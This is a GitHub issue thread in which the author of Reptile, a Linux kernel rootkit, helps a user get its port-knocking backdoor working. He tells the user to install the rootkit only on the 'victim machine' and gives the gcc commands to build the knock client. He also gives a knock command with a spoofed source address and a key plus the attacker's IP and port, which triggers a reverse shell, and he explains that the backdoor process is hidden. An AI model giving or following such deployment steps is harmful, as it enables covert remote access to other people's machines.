f0rb1dd3n / Reptile

LKM Linux rootkit
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Having trouble in getting the backdoor to work #12

Closed evelynEdison closed 6 years ago

evelynEdison commented 6 years ago

Hello, I'm not sure if I'm supposed to install the rootkit on both the client and the server, or whether this is something that you catch over netcat.

f0rb1dd3n commented 6 years ago

You have to install the rootkit only on victim machine. On your attacker machine you will only run the client.

I did the shellscript and makefiles to generate the client on the victim to give you a way to attack from the victim to another hosts in the network. But from your main attack machine perspective you only have to compile knock.c just typing:

cd Reptile/sbin
gcc knock.c -o knock

You have to chose the protocol, target address, source address (if you want spoof your address), the payload with key+ip+port.

You dont need to use netcat, cause I already have implement the listener, just use -l options at the end. Something like that:

./knock -x icmp -s (spoofed ip) -t (target IP) -d "F0rb1dd3n (attacker IP) (attacker port)" -l

Take a look into the code and change the key on heavens_door.c if you want.

I think it helps you.


evelynEdison commented 6 years ago

Hello, Should I run ./heavens_door command first on the victim machine? I run ./heavens_door command on the victim machine and run lsof -i tcp:80, but nothing shows on the screen. I think it should listen on the port 80

f0rb1dd3n commented 6 years ago

No man, Reptile already run heavens_door for you and hide her processes. You just have to run ./installer.sh install and nothing more. Also, heavens_door doesnt listen any port, that is a port knocking backdoor, she just inspect the packets that are being received on the machine, and returns a shell if is a right packet.

Originally I have configured just to inspect packets received via ICMP or TCP on port 80 or UDP on port 53. But that is irrelevant, you can change this. There is not a listen port, but a inspection of packets that are targeting a port.

evelynEdison commented 6 years ago

Hello, I have doubt in the \<reverse IP> in the line below:

-d Data to knock on backdoor: "\<key> \<reverse IP> \<reverse Port>"

If my real source ip is, should I use -d "F0rb1dd3n 31.2.861.291 4444" in reverse form instead of -d "F0rb1dd3n 4444"?

f0rb1dd3n commented 6 years ago

no man, you have to use the normal form -d "F0rb1dd3n 4444"

The client will do all the job for you.

f0rb1dd3n commented 6 years ago

@rabbpigPan are you having any another trouble? Can we close this issue?

evelynEdison commented 6 years ago

Yes, I am still having trouble in getting the backdoor to work. After I entered the correct source IP and target IP,

Knock Knock on Heaven's (Back)Door Written by: F0rb1dd3n

Knock knock Neo...

[+] Knocking with UDP protocol ......... [+] 59 bytes was sent

it only showed the information above and didn't prompt the reverse shell for a long time.

Does it support the NAT network or only work on the local network?

f0rb1dd3n commented 6 years ago

This backdoor does not support NAT, only local network

evelynEdison commented 6 years ago

Thanks for your reply. You can close the issue now.

ghost commented 5 years ago


Does not support the public network, only supports the internal network?

f0rb1dd3n commented 5 years ago

Just the internal, unless you have a NAT